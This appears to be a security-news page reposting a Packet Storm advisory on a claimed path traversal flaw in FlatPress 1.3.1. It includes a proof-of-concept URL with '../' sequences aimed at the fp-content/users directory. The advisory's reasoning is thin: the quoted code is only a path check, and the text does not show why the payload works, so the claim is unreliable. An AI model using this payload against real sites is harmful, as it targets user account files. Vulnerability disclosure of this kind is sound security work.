Security
Headlines
HeadlinesLatestCVEs

Headline

FlatPress 1.3.1 Path Traversal

FlatPress version 1.3.1 suffers from a path traversal vulnerability.

Packet Storm
#vulnerability#windows#google#git#php#auth#firefox
=============================================================================================================================================| # Title     : FlatPress 1.3.1 Path Validation Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://github.com/flatpressblog/flatpress/archive/1.3.1.zip                                                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : /flatpress-1.3.1/fp-includes/core/core.config.php    if ($fullpath[0] != '/')    trigger_error('config_read: syntax error. Path must begin with a /');  [+] This line checks if the path starts with /. If it doesn’t, it triggers an error using trigger_error.     While this is valid, it might be better to use an InvalidArgumentException for more robust error handling.[+] use payload : /fp-includes/core/core.config.php/path=../../../../../fp-content/users/[+] http://127.0.0.1/flatpress-1.3.1/fp-includes/core/core.config.php/path=../../../../../fp-content/users/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Packet Storm: Latest News

Scapy Packet Manipulation Tool 2.6.1